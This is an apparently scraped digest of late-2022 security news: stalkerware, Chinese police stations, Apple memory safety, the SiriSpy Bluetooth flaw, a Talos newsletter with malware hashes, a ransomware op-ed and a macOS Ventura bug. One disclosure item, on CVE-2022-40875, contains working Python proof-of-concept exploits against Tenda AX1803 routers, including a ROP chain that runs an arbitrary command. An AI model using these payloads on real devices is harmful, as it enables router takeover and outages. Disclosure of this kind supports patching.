Plus: The New York Post gets hacked, a huge stalkerware network is exposed, and the US claims China interfered with its Huawei probe.

For years, AlphaBay ruled the dark web. If you were in the market to buy drugs or stolen credit cards, the digital bazaar was the place to turn. At its peak, more than 350,000 products were listed for sale—an estimated 10 times the size of the notorious Silk Road market—and the website proved to be the ire of law enforcement the world round. That was until cops took AlphaBay offline in 2017.

This week, WIRED published the first in a six-part series detailing the hunt for Alpha02, the mastermind believed to be behind AlphaBay, and the huge international takedown operation that wiped the marketplace from the web. Each week, we’ll publish a new part of the series, excerpted from WIRED reporter Andy Greenberg’s new book, _Tracers in the Dark_.

Schools across the US have faced dozens of hoax calls about mass shootings in recent months. After a call is made, police scramble to the scene fearing the worst, only to find out there is no shooter. Now hoax phone call recordings obtained by WIRED and conversations with law enforcement officials reveal how the calls have been made and show that law enforcement officials are closing in on the alleged hoaxer. Police are looking for a male “with a heavy accent described as Middle Eastern or African” and have linked the phone calls to Ethiopia.

Elsewhere, a bug in Apple’s new macOS 13 Ventura operating system is causing problems for malware scanners and security monitoring tools. With the new software update, Apple accidentally crippled third-party security products in a way users may not notice. The company is planning to fix the bug in an upcoming software release.

We also looked at a newly discovered Chinese influence operation that is targeting US elections—although it is not having much success. And now that Elon Musk owns Twitter, here’s how you should think about your privacy and security on the bird website.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

Officials in Canada and the Netherlands are investigating allegations that Chinese police forces have operated a network of illegal police stations within their countries. According to reports that emerged this week, Chinese police forces have been operating out of clandestine bases and using their presence to track and threaten dissidents. The Dutch government has called such sites “illegal” and said it is “investigating exactly what they are doing here,” while officials in Canada said they are investigating “so-called ‘police’ stations.”

However, it is just the tip of the iceberg. Spanish civil rights group Safeguard Defenders first claimed that Chinese police forces from the cities of Fuzhou and Qingtian were running “overseas police service stations” across the West in a report published in September. Since 2018, the group claims, more than 38 police service stations have appeared in “dozens of countries” spread across five different continents. “Such overseas police ‘service stations’ have been used by police back in China to carry out such ‘persuasion to return’ operations on foreign soil, including in Europe,” the report states. Lawmakers in both England and Scotland are also planning on investigating the stations, reports say.

Chinese officials have not denied the existence of the service stations, but say they exist to provide bureaucratic services to Chinese citizens and don’t involve police operations. The Chinese embassy in Canada said the stations exist to allow Chinese citizens to complete tasks such as renewing their driving licenses: “The main purpose of the service station abroad is to provide free assistance to overseas Chinese citizens in this regard.”

If stalkerware is installed on your phone or laptop, the malicious software can send every tap, message, and photo back to the person who added it to your device. The software is often hard to find, and the insidious industry that creates it operates in the shadows. This week, a TechCrunch investigation revealed how a huge stalkerware network, with hundreds of thousands of victims, operates.

Leaked data obtained by TechCrunch shows TheTruthSpy stalkerware has been installed on more than 300,000 devices and has victims all around the world. Over a six-week period analyzed by the publication, more than 9,400 new devices were infected with the stalkerware. Thousands of calls, millions of text messages, and more than 470,000 photos and videos were collected by the app without its victims’ knowledge. And data was also likely collected from the phones of children. This tool can tell if your device was compromised.

A pair of Chinese intelligence officers attempted to bribe a US official involved in the criminal case against Huawei, the US Department of Justice claimed this week. Across three separate cases, the Justice Department charged 13 people with alleged efforts to “exert influence” in the US on behalf of the People’s Republic of China. The charges range from trying to disrupt the US government’s Huawei investigation to trying to recruit people as intelligence agents. Two people were also arrested for allegedly attempting to “cause the forced repatriation” of a Chinese national living in the US. “The actions announced today take place against a backdrop of malign activity from the government of the People’s Republic of China that includes espionage, attempts to disrupt our justice system, harassment of individuals, and ongoing efforts to steal sensitive US technology,” deputy attorney general Lisa O. Monaco said in a statement. In an unprecedented move in July, the head of the FBI and the UK’s MI5 made a joint public appearance to warn about the perceived threat from China, saying the nation is the biggest threat to economic and national security.

The website and Twitter account of the _New York Post_ were hacked this week. On Thursday, the publication’s Twitter account started sharing links to stories with offensive headlines and posts about politicians. US president Joe Biden, US representative Alexandria Ocasio-Cortez, and New York governor Kathy Hochul were all targeted. The _Post_, which is owned by News Corp, tweeted that it was investigating the incident, but very few details have been made public so far. In February this year, News Corp announced it had been hacked, with the attackers believed to have accessed journalists’ emails. The latest attack against the _Post_ echoes a recent hack of the business news website _Fast Company_. In September, the publication’s content management system (CMS) was breached and the attacker sent offensive push notifications to Apple News subscribers.

China Operates Secret ‘Police Stations’ in Other Countries

Apple engineers share technical details about the team's work on memory safety features on the new Apple Security Research site.

Apple's work on hardening the memory allocator has made it harder for attackers to exploit certain classes of software vulnerabilities on iOS and Mac devices, the company's security engineers wrote on a new website Apple launched to share technical details behind iOS and MacOS security technologies.

The new initiative, Apple Security Research, also offers tools to help security researchers report issues to Apple, get real-time status updates for submitted reports, communicate securely with Apple engineers investigating the issue, and provides information about the Apple Security Bounty program. The intent behind the new security hub is to share with the research community how Apple engineers approach security challenges, and also to invite researcher contributions and feedback.

Memory safety is a key area of focus, especially since memory safety violations are the most widely exploited class of software vulnerabilities. On Apple platforms, improving memory safety includes "finding and fixing vulnerabilities, developing with safe languages, and deploying mitigations at scale," the engineers wrote in a technical post on XNU memory safety.

XNU is the kernel at the core of iPhones, iPads, and Macs.

Much of the code running on the iPhone, iPad, and Mac were written using "memory-unsafe" programming languages, which means they don’t prevent memory safety violations and developers can inadvertently and unknowingly violate memory safety rules while writing code, the researchers wrote. Those issues can be exploited by attackers to crash software, execute unauthorized command, and harvest sensitive information.

It is infeasible to rewrite large amounts of existing code using memory-safe languages, so "improving memory safety is an important objective for engineering teams across the industry,” the engineers wrote.

Apple laid the groundwork for the hardened memory allocator _kalloc\_type_ back in iOS 14 when it introduced _kheaps_, the data split, and virtual memory sequestering. Apple added randomized bucketed type isolation to the zone allocator when it introduced _kalloc\_type_ in iOS 15. With the release of iOS 16 and macOS Ventura, the hardened allocator is now available on all the systems using the XNU kernel.

"Our fundamental strategy is to design an allocator that makes exploiting most memory corruption vulnerabilities inherently unreliable," the researchers wrote. "This limits the impact of many memory safety bugs even before we learn about them, which improves security for all users."

In Apple's update on its bounty program, the company said it has awarded close to $20 million to security researchers over the past two-and-a-half years since the program was launched. While average payouts are around $40,000 in the product category, the company has paid 20 separate rewards over $100,000 for high-impact issues. Evaluation criteria researchers need to meet in order to collect bounties are available on Apple Security Research.

Apple Launches New Security Research Hub

Directory Traversal vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server Dashboard allows Path Traversal. This affects versions from 1.5.11 through 1.5.12, from 1.6.5 through 1.6.20.1, from 1.7.0 before 1.7.16.1

CVE-2022-0072: openlitespeed/httpserver.cpp at v1.7.16 · litespeedtech/openlitespeed

Without even asking for permissions, the newly discovered 'SiriSpy' flaw in Apple's iOS Bluetooth access could allow someone to access user interactions with Siri and keyboard-dictation audio.

For anyone who thought their conversations with Siri were sacred and keyboard dictation recordings were secure, a new analysis found a flaw in the iOS Bluetooth that could allow someone to grab audio from both. 

The find is from researcher Guilherme Rambo, who published details of an Apple iOS flaw he calls "SiriSpy," tracked under CVE-2022-32946. It would let a malicious app that a user has been convinced to install eavesdrop on audio interactions with iPhones.

"Any app with access to Bluetooth could record your conversations with Siri and audio from the iOS keyboard dictation feature when using AirPods or Beats headsets," Rambo wrote. "This would happen without the app requesting microphone access permission, and without the app leaving any trace that it was listening to the microphone." 

Rambo explained he regularly does cybersecurity research on AirPods, leading him to the find. 

After alerting Apple to the vulnerability in late August, Rambo said on Oct. 24 that iOS 16.1, along with all of the other remaining Apple operating systems, were updated with a fix. Making the find even sweeter, Rambo added he's been told by Apple he will receive a $7,000 bug bounty for his efforts. 

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

iOS Bug Lets Apps Record Siri Conversations

Tenda AX1803 v1.0.0.1 was discovered to contain a heap overflow in the function GetParentControlInfo.

**Tenda ax1803 is vulnerable to a buffer overflow****Setting up the environment**

　　　Create a br0 NIC:

sudo tunctl -t br0 -u root
sudo ifconfig br0 192.168.0.1/24

　　　Copy qemu-arm-static to the corresponding directory on the filesystem and start the tdhttpd service:

sudo chroot . ./qemu-arm-static ./bin/tdhttpd

**The first vulnerability**

　　　A stack overflow vulnerability exists in the fromAdvSetMacMtuWan function, which can lead to a denial of service or remote code execution vulnerability through a carefully constructed http request.

 　　

　　The proof-of-concept code for the vulnerability is as follows:

import requests,sys
from pwn import \*

url \= sys.argv\[1\] + "/goform/AdvSetMacMtuWan"
cmd \= sys.argv\[2\]

libc\_base \= 0xfef99000
gadget1 \= 0xff08dcdc # mov r0, sp ; blx r3
gadget2 = 0xff01987c # mov r3, r4 ; mov r0, r3 ; pop {r4, pc}
system\_addr = 0xfefd06c8

payload \= '128999999999'\+ p32(system\_addr) + p32(0xdeadbeef)\*3 + p32(gadget2)
payload += p32(0xdeadbeef) + p32(gadget1) + cmd
payload \= "wanMTU=%s&wanSpeed=0&cloneType=0&mac=00:00:00:00:00:01"%payload
content\_length \= len(payload)
headers \= {
    "Host":"192.168.0.1",
    "X-Requested-With":"XMLHttpRequest",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
    "Origin":"http://192.168.0.1",
    "Referer":"http://192.168.0.1/main.html",
    "Content-Length":"%d"%content\_length
}

r \= requests.post(url,headers = headers,data = payload)

**The Second vulnerability**

　　　　A heap overflow vulnerability exists in the GetParentControlInfo function, which can cause a denial of service attack through a carefully constructed http request.

 　　　　The proof-of-concept code for the vulnerability is as follows:

import requests,sys
from pwn import \*

url \= sys.argv\[1\] + "/goform/GetParentControlInfo"

payload \= 'a'\*0x400
payload \= 'mac=%s'%payload
content\_length \= len(payload)
headers \= {
    "Host":"192.168.0.1",
    "X-Requested-With":"XMLHttpRequest",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
    "Origin":"%s"%url,
    "Referer":"%s/main.html"%url,
    "Content-Length":"%d"%content\_length
}

r \= requests.post(url,headers = headers,data = payload)

**The third  vulnerability**

　　　A heap overflow vulnerability exists in the setSchedWifi function, which could cause a denial of service by constructing an http request.

 　　　The proof-of-concept code for the vulnerability is as follows:

import requests,sys
from pwn import \*

url \= sys.argv\[1\] + "/goform/openSchedWifi"

payload \= 'a'\*0x400
payload \= 'schedWifiEnable=&schedStartTime=%s&schedEndTime=&timeType=&day='%payload
content\_length \= len(payload)
headers \= {
    "Host":"192.168.0.1",
    "X-Requested-With":"XMLHttpRequest",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
    "Origin":"%s"%url,
    "Referer":"%s/main.html"%url,
    "Content-Length":"%d"%content\_length
}

r \= requests.post(url,headers = headers,data = payload)

CVE-2022-40875: Tenda ax1803 is vulnerable to a buffer overflow - Riv4ille

Supply chain attacks were all the rage in 2020 after SolarWinds, but we seem to have forgotten how important they are.

Thursday, October 27, 2022 14:10

Welcome to this week’s edition of the Threat Source newsletter.

There are plenty of jokes about whether we’re “aware” of cybersecurity during National Cybersecurity Awareness Month. But now I’m wondering if people are aware of supply chain attacks.

I thought we hit the pinnacle of supply chain attacks in 2020 with the SolarWinds attack, when these types of attacks dominated headlines and defenders started shouting from the mountaintops about how important it is to be ready for supply chain attacks.

And then Kaseya came along a few months later when attackers found a different way to deploy malicious updates that were disguised as legitimate patches.

And still today, we’re warning about the dangers of how prevalent supply chain attacks are and how everyone needs to be ready for this attacker technique. This leaves me wondering if Kaseya and SolarWinds weren’t the breaking point — what is?

It seems like no matter how many times we see major ransomware attacks, even coming to the point of making it impossible for people to get gas, attackers are back again with another ransomware attack a few weeks later.

We still have several hurdles to overcome to fix the supply chain attack problem, as Jaeson Schultz from our Outreach team outlined in this recent post. But it’s clear that these attacks aren’t going anywhere, and neither are defenders’ warnings.

As I wrote at the start of October, it can be easy to poke fun at Cybersecurity Awareness Month because it’s impossible to define what it even means to be “aware” of cybersecurity. Clearly, there’s still awareness to spread, though, and we keep needing to spread it in regard to supply chain attacks, ransomware and pretty much every other type of cyber attack.

**The one big thing**

For the first time since collecting such data, Cisco Talos Incident Response saw an equal number of ransomware and pre-ransomware engagements, making up nearly 40 percent of threats in the third quarter of 2022. It can be difficult to determine what constitutes a pre-ransomware attack if ransomware never executes and encryption does not take place. However, Talos IR assesses that the combination of Cobalt Strike and credential-harvesting tools like Mimikatz, paired with enumeration and discovery techniques, indicates a high likelihood that ransomware is the final objective.

**Why do I care?**

This data represents what Talos IR is actively seeing in the wild over the past few months and is likely representative of the broader threat landscape.

**So now what?**

A lack of MFA remains one of the biggest impediments to enterprise security. Nearly 18 percent of engagements either had no MFA or only had it enabled on a handful of accounts and critical services. Talos IR frequently observes ransomware and phishing incidents that could have been prevented if MFA had been properly enabled on critical services, such as endpoint detection and response (EDR) solutions. Talos IR recommends disabling VPN access for all accounts that are not using two-factor authentication.

**Top security headlines of the week**

The Biden administration is preparing to release updated guidelines and warnings around election security with a few days left before the midterm elections. A bulletin reportedly being drafted includes information on threats from Russia, China and other state-sponsored actors. Election workers and local officials are also having to deal with physical threats to polling workers and locations, all while the number of volunteers is dwindling. Earlier this month, the U.S. Cybersecurity and Infrastructure Security Agency released a PSA stating that malicious cyber activity is "unlikely to disrupt or prevent voting." (Politico, Axios, Voice of America)

Apple released security updates for its iOS and iPadOS operating systems this week, including fixes for a vulnerability that “may have been actively exploited.” There are 20 vulnerabilities fixed in these updates in all. CVE-2022-42827 is the most notable vulnerability, which could allow an attacker to execute code with Kernel privileges via an attacker-controlled app. This is the third Kernel-related out-of-bounds memory vulnerability that Apple has patched in each of its previous security updates: CVE-2022-32894 and CVE-2022-32917. CVE-2022-32917 was known to be used in attacks in the wild. (Forbes, The Hacker News)

Two vulnerabilities in Microsoft's Mark of the Web (MoTW) security feature could allow an attacker to send JavaScript files that could bypass security blocks in place. Attackers are reportedly actively exploiting both issues, though Microsoft has yet to issue any formal fixes for the vulnerabilities, and there are no workarounds available. Mark of the Web protects users against files from untrusted sources, but the two vulnerabilities could allow the attackers to construct the files in a way that they are not appropriately marked by Windows. Attackers commonly use .js files as attachments or downloads that can run outside a web browser. (Dark Reading, Bleeping Computer)

**Can't get enough Talos?**

*   Talos Takes Ep. #118: Threat Hunting 101
*   Beers with Talos Ep. #127: I’m a skiddie, and you can too!
*   A bug in Abode’s home security system could let hackers remotely switch off cameras
*   Talos Incident Response Q3 2022 Quarterly Report

**Upcoming events where you can find Talos**

**Click or Treat? How not to fall for a phishing attack this Halloween** (Oct. 31)  
Virtual

**BSides Lisbon** (Nov. 10 - 11)  
Cidade Universitária, Lisboa, Portugal

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** 58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681  
**MD5:** f1fe671bcefd4630e5ed8b87c9283534  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** PUA.Win.Tool.Hackkms::1201

**SHA 256:** 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645  
**MD5:** 2c8ea737a232fd03ab80db672d50a17a  
**Typical Filename:** LwssPlayer.scr  
**Claimed Product:** 梦想之巅幻灯播放器  
**Detection Name:** Auto.125E12.241442.in02

Threat Source newsletter (Oct. 27, 2022): I thought we were already aware of supply chain attacks?

The implementation of backslash parsing in the Dart URI class for versions prior to 2.18 and Flutter versions prior to 3.30 differs from the WhatWG URL standards. Dart uses the RFC 3986 syntax, which creates incompatibilities with the '\' characters in URIs, which can lead to auth bypass in webapps interpreting URIs. We recommend updating Dart or Flutter to mitigate the issue.

CVE-2022-3095: sdk/CHANGELOG.md at master · dart-lang/sdk

Automobile, Energy, Media, Ransomware?When thinking about verticals, one may not instantly think of cyber-criminality. Yet, every move made by governments, clients, and private contractors screams toward normalizing those menaces as a new vertical.
Ransomware has every trait of the classical economical vertical. A thriving ecosystem of insurers, negotiators, software providers, and managed

**Automobile, Energy, Media, Ransomware?**

When thinking about verticals, one may not instantly think of cyber-criminality. Yet, every move made by governments, clients, and private contractors screams toward normalizing those _menaces_ as a new vertical.

Ransomware has every trait of the classical economical vertical. A thriving ecosystem of insurers, negotiators, software providers, and managed service experts.

This cybercrime branch looks at a loot stash that counts for trillions of dollars. The cybersecurity industry is too happy to provide services, software, and insurance to accommodate this new normal.

Intense insurer lobbying in France led the finance ministry to give a positive opinion about reimbursing ransoms, against the very advice of its government's cybersecurity branch. The market is so big and juicy that no one can get in the way of "the development of the cyber insurance market."

In the US, Colonial pipeline is seeking tax reductions from the loss incurred by the 2021 ransomware campaign they were victims of. But wait… to what extent is the government (and, by extension, every taxpayer) is then indirectly sponsoring cybercrime?

All governments and insurance corporations forget a simple fact in this equation: impunity. A nation-state can afford to cover risk and refund losses if it can enforce law & order. It is the very definition of a nation: a monopoly on armed forces to ensure everyone's property is protected. This system meets a limit in cyberspace since the vast majority of cybercriminals are never found and, even less, tried.

The possibility of air-gapping attacks against any target makes it extremely difficult to have an international subpoena to analyze every trail.

As long as the cybersecurity industry (and by extension the economy) gets a fair share of this terrible amazing nightmare opportunity, you can expect ransomware to become the new normal.

And by the way, stop calling it a new attack vector, it's anything but this. The ways cybercriminals break-in are the same as ten years ago: exploits, social engineering, Web shenanigans, and password bruteforce, to name a few.

**A short-sighted industry will cry**

On paper, this fantastic cyber insurance market is a generational wealth maker. Sure, but did you know most of the latest prominent breaches were made possible using an incredible technic named "Credential reuse"?

No? Well, let me tell you why you'll cry very soon and why most companies should get those kinds of insurances before their cost is multiplied by tenfold.

Simply put, credential reuse consists in buying legitimate credentials from real users and… reusing them. Yet still, you might not understand the true impact of this. Let me explain it to you better.

Introducing Robert, 50 y/o, an accountant working in the CFO's team of "Big Juicy corp I sold a contract to". Robert has to pay rent, health insurance, and a pension, let aside the fact that he hates the guts of Big Juicy. Now Robert is contacted by an anonymous source, telling him he'll get 2 bitcoins if he gives his real VPN login and password… Or if he clicks on a link he received via email… Robert just has to wait 24 hours and tell the IT services someone stole his laptop on the subway.

How do you defend against the insider threat? Big Juicy insurance policy is a percentage of its turnover, cybercriminals know it. They can adjust the price tag of Robert's loyalty to say… 10% of what they expect the insurance coverage to be? Those 2 bitcoins can also be 10 or 20 if Robert works for SpaceX or Apple.

Still sure about this insurance thing or that normalizing Ransomware is an angle to more significant profit? Well, I'm short insurance & long bitcoin then.

**One more rich vs. poor asymmetry**

The problem here is not fundamentally Big Juicy Corp. They will smartly put the insurance and costs of defending themselves on the proper account in the balance sheet. Their profit will be a bit diminished, but in the end, it's somehow the taxpayer that will be covering the losses of a smaller tax collection.

But hospitals? I don't mean the private clinics that cost millions per year, not unlike Cyberpunk Traumateam depicts it. No, the real, free-for-all hospitals that serve one role: everybody's health. In France, where I live, those are jewels that successive governments are trying to break apart, with a certain success. They are badly underfunded and cannot already cope with their debts and maintain their outdated IT infrastructure. Once they get breached, though, they are the talk of the town. How much is your health data worth? Probably not much. Otherwise why would Apple & Samsung invest so much into collecting them, really?

And what about NGO, NPO, small companies, Media, eCommerce sites, etc.

You'd think they are below the radar. Absolutely not. They are less defended, require less investment, and provide fewer profits, but hey, cybercriminals need to climb the ladder too.

**From external perimeter to unknown boundaries**

Beyond credential reuse, the external IT perimeter also became more complex than ever. The little ones' Android device is riddled with malware but connected to the same home Wi-Fi you're working from.

The VPN everywhere became the norm, and suddenly unreleased exploits are popping all over the darknet to breach them. Two-factor authentication is so complex to use that hey… let's just disable it, at least for the boss.

Sysadmin already had a hard time migrating to the next-gen virtualization system. Still, they all become part-time SecOPS and need to know about containers, VMs, new protocols, and who has been using an external SaaS without notifying the IT department because it's "so super useful, we don't care if it hasn't been audited". What space is left to train the team, and explain to them that "password" isn't actually a password and that anyone can send an email from neil@moon.com?

And… by the way… A behavior detection on your external perimeter can tell you that Robert should be connecting from Detroit and not DubaÏ, Delhi, or Moscow.

**Crowdsourcing the effort**

Welcome to the age of Digital Darwinism, where the most adapted will survive.

Did we, as humankind, ever have a major victory like dealing with a pandemic, sending people to the moon, or inventing complex IT devices, without teamwork? Without the division of labor?

Then why would cyber security be the best field to adopt the loner attitude and win?

Well, spoiler alert, it's not.

There is a way out: a collective et participative effort.

If you want to defeat an army of cybercriminals, let's adopt a good old classic tactic and have a bigger and better-equipped army (recent history showed us the latter is equally important).

Not unlike the neighborhood watch, open source makes it possible to crowdsource the effort, to team together, and detect all malevolent IP addresses around the world. To deter any bad behavior, as a digital herd. Anyone can partake in the effort and help those without budgets to better defend what's precious to us: free media, safe hospitals, and secure NGOs.

Open source and participative networks can break this death loop cybercriminals and cybersecurity industries are partaking in.

_**Note —** This article is written and contributed by Philippe Humeau, CEO & co-founder of CrowdSec._

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Ransomware: Open Source to the Rescue

A now-patched security flaw in Apple's iOS and macOS operating systems could have potentially enabled apps with Bluetooth access to eavesdrop on conversations with Siri.
Apple said "an app may be able to record audio using a pair of connected AirPods," adding it addressed the Core Bluetooth issue in iOS 16.1 with improved entitlements.
Credited with discovering and reporting the bug in August

A now-patched security flaw in Apple's iOS and macOS operating systems could have potentially enabled apps with Bluetooth access to eavesdrop on conversations with Siri.

Apple said "an app may be able to record audio using a pair of connected AirPods," adding it addressed the Core Bluetooth issue in iOS 16.1 with improved entitlements.

Credited with discovering and reporting the bug in August 2022 is app developer Guilherme Rambo. The bug, dubbed **SiriSpy**, has been assigned the identifier CVE-2022-32946.

"Any app with access to Bluetooth could record your conversations with Siri and audio from the iOS keyboard dictation feature when using AirPods or Beats headsets," Rambo said in a write-up.

"This would happen without the app requesting microphone access permission and without the app leaving any trace that it was listening to the microphone."

The vulnerability, according to Rambo, relates to a service called DoAP that's included in AirPods for Siri and Dictation support, thereby enabling a malicious actor to craft an app that could be connected to the AirPods via Bluetooth and record the audio in the background.

This is compounded by the fact that "there's no request to access the microphone, and the indication in Control Center only lists 'Siri & Dictation,' not the app that was bypassing the microphone permission by talking directly to the AirPods over Bluetooth LE."

While the attack requires that the app has access to Bluetooth, this restriction can be trivially bypassed as users granting Bluetooth access to the app are unlikely to expect that it could also open the door to accessing their conversations with Siri and audio from dictation.

On macOS, however, the exploit could be abused to achieve a total bypass of the Transparency, Consent and Control (TCC) security framework, meaning any app can record conversations with Siri without requesting for any permissions in the first place.

Rambo said the reason for this behavior is owing to the lack of entitlement checks for BTLEServerAgent, the daemon service responsible for handling DoAP audio.

A software patch remediating this flaw is available for iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later. It has also been resolved in all supported versions of macOS.

The iOS 16.1 update, which was released on October 24, 2022, comes with fixes for a total of 20 flaws, including a Kernel vulnerability (CVE-2022-42827) that it disclosed as being actively exploited in the wild.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Apple iOS and macOS Flaw Could've Let Apps Eavesdrop on Your Conversations with Siri

Your anti-malware software may not work if you upgraded to the new operating system. But Apple says a fix is on the way.

The release of Apple's new macOS 13 Ventura operating system on October 24 brought a host of new features to Mac users, but it's also causing problems for those who rely on third-party security programs like malware scanners and monitoring tools. 

In the process of patching a vulnerability in the 11th Ventura developer beta, released on October 11, Apple accidentally introduced a flaw that cuts off third-party security products from the access they need to do their scans. And while there is a workaround to grant the permission, those who upgrade their Macs to Ventura may not realize that anything is amiss or have the information needed to fix the problem. 

Apple told WIRED that it will resolve the issue in the next macOS software update but declined to say when that would be. In the meantime, users could be unaware that their Mac security tools aren't functioning as expected. The confusion has left third-party security vendors scrambling to understand the scope of the problem.

“Of course, all of this coincided with us releasing a beta that was supposed to be compatible with Ventura,” says Thomas Reed, director of Mac and mobile platforms at the antivirus maker Malwarebytes. “So we were getting bug reports from customers that something was wrong, and we were like, ‘crap, we just released a flawed beta.’ We even pulled our beta out of circulation temporarily. But then we started seeing reports about other products, too, after people upgraded to Ventura, so we were like, ‘uh oh, this is bad.’”

Security monitoring tools need system visibility, known as full disk access, to conduct their scans and detect malicious activity. This access is significant and should be granted only to trusted programs, because it could be abused in the wrong hands. As a result, Apple requires users to go through multiple steps and authenticate before they grant permission to an antivirus service or system monitoring tool. This makes it much less likely that an attacker could somehow circumvent these hurdles or trick a user into unknowingly granting access to a malicious program. 

Longtime macOS security researcher Csaba Fitzl found, though, that while these setup protections were robust, he could exploit a vulnerability in the macOS user privacy protection known as Transparency, Consent, and Control to easily deactivate or revoke the permission once granted. In other words, an attacker could potentially disable the very tools users rely on to warn them about suspicious activity. 

Apple attempted to fix the flaw multiple times throughout 2022, but each time, Fitzl says, he was able to find a workaround for the company's patch. Finally, Apple took a bigger step in Ventura and made more comprehensive changes to how it manages the permission for security services. In doing that, though, the company made a different mistake that's now causing the current issues.

“Apple fixed it, and then I bypassed the fix, so they fixed it again, and I bypassed it again,” Fitzl says. “We went back and forth like three times, and eventually they decided that they will redesign the whole concept, which I think was the right thing to do. But it was a bit unfortunate that it came out in the Ventura beta so close to the public release, just two weeks before. There wasn't time to be aware of the issue. It just happened.”

If you use a security scanner on your Mac and you update to macOS Ventura, check the program directly to see if it's flagging an error. The workaround to fix the problem is simple once you know to do it. In System Preferences go to Security & Privacy, then the Privacy tab, and then Full Disk Access. Click the lock icon in the lower-left corner of the screen and authenticate with your system password to allow changes. Then uncheck the box next to any security services that are malfunctioning, to let the system know you want to disable their permission. Click the lock in the lower-left corner again to save the change, then redo the process and recheck the relevant boxes to freshly enable the permission without the flaw.

“Once you upgrade to Ventura, you could run a Malwarebytes scan, but it wouldn’t scan everything that it could if it had full disk access, and all of the real-time protection features are completely disabled,” Malwarebytes' Reed says. “We get handicapped if we don’t get full disk access. And there are a number of ways that you could tell if Malwarebytes is not functioning properly, but if you’re not looking in the right places or you disabled certain settings, you might not notice. With other security clients, it's probably similar—if you’re not interacting with it, you might not know.”

Researchers noticed—and Apple confirmed to WIRED—that the bug doesn't happen when large organizations use Apple's “mobile device management” program to upgrade their fleet of devices to Ventura. This is significant, because if the bug carried over to managed enterprise devices, it would mean yet another reason for companies to put off important software updates. 

MacOS security researcher Patrick Wardle, founder of the Objective-See Foundation, says that he still recommends regular users upgrade their Macs to Ventura to get the new operating system's other security and privacy protections. In the meantime, though, Wardle says he has been deluged by bug reports about his free, open source malware monitoring tool, BlockBlock. The Ventura bug even makes it appear that security services like BlockBlock and Malwarebytes have been granted extra system access beyond what these programs request, including the accessibility permission, access to input monitoring, and even screen recording. 

“Users were understandably asking me, ‘Why does your tool need that?!’ And I'm like, ‘Uh, I have no idea. It doesn't!’” Wardle says. “It shows that when Apple is pushing out security fixes for reported bugs, they're still struggling to do that comprehensively and successfully without breaking other things. And in this case, they’re shipping a version of their operating system that is breaking security tools for millions, if not tens of millions, of users. It's frustrating and disheartening.”

Independent researcher Fitzl, who presented his original disabling permission vulnerability findings at Black Hat Asia in May and Wardle's Objective-See Mac and iOS security conference at the beginning of October, says that he's sympathetic about the misstep. 

“Apple was trying to redesign this thing to fix all of my bypasses, and they made a mistake—it happens,” he says. But he adds, ruefully, that the whole situation has played out in an unfortunate way. “I felt a bit weird about all of these issues and knowing that I pushed Apple into this because I was trying to get something else fixed.”

Tag

#apple